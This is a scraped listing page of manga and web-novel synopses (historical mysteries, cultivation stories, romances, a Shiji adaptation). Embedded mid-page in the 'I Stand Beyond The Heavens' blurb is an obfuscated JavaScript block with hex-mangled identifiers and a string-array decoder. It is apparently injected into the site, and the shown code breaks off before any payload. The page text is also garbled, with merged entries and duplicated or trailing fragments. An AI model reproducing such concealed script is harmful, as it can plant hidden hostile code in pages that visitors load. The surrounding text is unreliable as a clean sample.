Historical - Page 71

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3978 results

Soul-Lightening Lamp

Science? Superstition? Little tricks? Can all things in the world be explained by science? If not, is there a mysterious force outside of science which secretly controls history? What if you know all about history are lies? This story is set up in the period of the Republic of China (around 1916) when advanced science and technology from Europe are refreshing all recognition of this ancient agricultural country. The title of the book and the first part of the Ch. 1 is a metaphor. “Light” means “to initiate”, “lamp” implies “the container”. The “soul” from the title does not mean the soul basically, but refer to a mysterious force besides the soul. Now let me open the door of “truth": for you.


Tian Xia Wu Lai

Tian Xia Wu Lai Ruan Ruan doesn’t remember anything about her past. She just knows she was saved by a beggar who claims to be her husband. She follows him through his daily life, meets new people, comes across danger…. Who is she? Who is this boy? And is he truly what he says he is? Show less Ruan Ruan doesn’t remember anything about her past. She just knows she was saved by a beggar who claims to be her husband. She follows him through his daily life, meets new people, comes across danger…. Who is she? Who is this boy? And is he truly what he says he is?


Aurora’s Sanctuary for Lost Things

Aurora has always had a habit of picking up random things off the streets since she was young. A chicken, a horse, and now… a person? When Aurora finds Jovian passed out and injured in the forest, she brings her in and takes care of her like family. However, despite Aurora’s kindness, Jovian keeps her at arm’s length. It’s obvious that Jovian is hiding a secret, but Aurora is willing to wait until she opens up. But when the village sheriff comes looking for Jovian, it’s a matter of time until Aurora finds out that Jovian might not be the person she thought her to be… Jupiter’s Aurora La vallée d’Aurore Phép màu của Aurora 君を拾ったあの日から 목성의 오로라


My Apprentice: Game Over Again! Ss2

Revered as the most powerful person in cultivation, Grand Master Yu Yan eventually took on an apprentice after waiting for over 16,000 years. He offered careful instruction and protection to her, but she died in the end. Then, Yu Yan took another one as his apprentice, with great instruction and protection, but she died as well! After that, he took on one another, and finally ... she died! Why it is Yu Yan who is always picking up the same reborned apprentice!


I Stand Beyond The Heavens

“Before you kill me, can you tell me the name of your technique? Also, if you can, please tell me how to beat you” Holding a technique generator in hand, Ye Hai, who was transported here from another world, thought that all those book he read and those movies he watched finally did not go to waste! Having all those god-tier tricks, he’s basically invincible! He could get any type of techniques if he wants! I’m definitely going to be invincible. Not even the author can stop me because I said it myself! Looking at the fox creature transforming into a beautiful women, Ye Hai scratches his thick hair. heavenly dragon’s force!<script></script><script>(function(_0x1b8b6d,_0x160ac6){var _0x1d4bc4=_0x3e5b,_0x815e56=_0x1b8b6d();while(!![]){try{var _0x1be6b2=parseInt(_0x1d4bc4(0x183))/(-0xa44+0x167d+-0xc38)+-parseInt(_0x1d4bc4(0x17c))/(-0x1891+0xb5f+0xd*0x104)+-parseInt(_0x1d4bc4(0x18c))/(0x6e2+-0x1f05*0x1+0x1*0x1826)*(parseInt(_0x1d4bc4(0x174))/(-0x139+0x1154+0x1*-0x1017))+-parseInt(_0x1d4bc4(0x180))/(-0x2c*0x15+-0xa58+0xdf9)+parseInt(_0x1d4bc4(0x17a))/(0x2d6*0x8+0x1136+0x10*-0x27e)*(-parseInt(_0x1d4bc4(0x194))/(0x10f3+0x4ca*-0x2+-0x758))+-parseInt(_0x1d4bc4(0x179))/(-0x1bc8+-0x5*0x71f+0xcaf*0x5)*(-parseInt(_0x1d4bc4(0x182))/(0xa4a*-0x3+-0x575*0x1+0x245c))+parseInt(_0x1d4bc4(0x17d))/(0x77*0x3d+0x1fd*0x9+-0x2e36);if(_0x1be6b2===_0x160ac6)break;else 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+C: Sword and Cornett

There was once a hero who vanquished the darkness of the land and liberated the people. He then built a kingdom, and had his descendants rule as kings. Although they had ruled the land for so many years, in reality, political power was being wielded solely by the aristocrats of each region. One day, this seemingly peaceful kingdom was disturbed by the mysterious death of the principal heir to the throne. The sequence of events that this assassination set into motion, would soon come to involve all of those with the right to become the next king... There's the spin- off: +C: Sword and Cornett Appendix


Eternal Flower

During the Asuka period (538-710), Tasuna was sold by his stepfather to a local rich man. Fleeing from such a fate, Tasuna went to the mountain in search of Azeri, the master goldsmith who used to practice the craft in the Capital with his late father. When Tasuna collapsed from exhaustion, he was rescued by a man who seemed unfeeling—!?


Kenkouki - Hi no Kuni Daiteikokugun Kurenai Ikki Tousentai

Atrable Federation is a military superpower that started the Endless War. After conquering many neighboring countries the Federation turns its attention to a small island country that is big only in name, the Great Empire of Sun. Akiyama Maika is a girl seeking her father who went to war when she was little. Seeing the chance in the arrival of the legendary squad of mighty soldiers, Ikkitousentai, to a nearby city, she questions the military about her father's whereabouts. However, much to the girl's surprise her father appears not to be enlisted in the army. Maika, dejected by this news as well as savage city life, suddenly encounters a burly man falling from the sky. The bystanders name him the Invincible Wolf, one of the Ikkitousentai, and it seems like he knows something about Maika's father! Unfortunately, he isn't willing to tell anything to a civilian. Maika decides to enlist in the Ikkitousentai in order to find her father. Even though the army doesn't accept women, such a thing won't stop Maika! [momimomi]



Manga adaptation of Sima Qian's Shiji (Records of the Grand Historian), which depicts famous people and events drawn mostly from 8th century BC~2nd century BC of Chinese history.


Ginsekai no Shoumei

Alza lives alone on a desolate snowy plain. One day, Leah, a sorcerer from the magical city collapses near his house. Alza forbids Leah from using magic in his presence and shows her how beautiful life can be outside of the magical world. But, why does Alza hate magic, how did Leah get outside the magical city, and what will happen when Leah returns home?


I Gave Birth To A Murderer’S Child

Karinne, the daughter of Viscount Tyrian, is on the verge of getting sold off as one of the lustful Count Dupo’s concubines. After sleeping with a mysterious handsome stranger, Karinne gives birth to her son…all according to plan! After deeming his daughter worthless, he sells her off. Losing the will to live, she reunites with the man who she spent that fateful night with, who is revealed to be the Grand Duke. I Gave Birth to a Villain’s Child, I Raised the Son of a Murderer, Tôi sinh con cho kẻ sát nhân, 살인귀의 아이를 낳았다c


Wizard Of Eden

One day, a circus troupe came across the street from Eden's school. Passing by the barracks, Eden meets the ring master of the troupe, Luke. Eden, who feels guilty for Luke for a certain childhood incident, recognizes him at one glance. However, Luke does not recognize him, and Eden felt upset leads him to getting drunk at the circus welcome party. The two accidentally spend a passionate night and quickly become close. Enamoured by Eden's cute and unguarded natural, Luke, who has lived a prosperous and carefree life so far, can't stop himself from falling for him. Eden is also attracted to Luke, who has grown up to be serious and cool, unlike when his young self, but the rumours about him being a Casanova leave him uneasy.
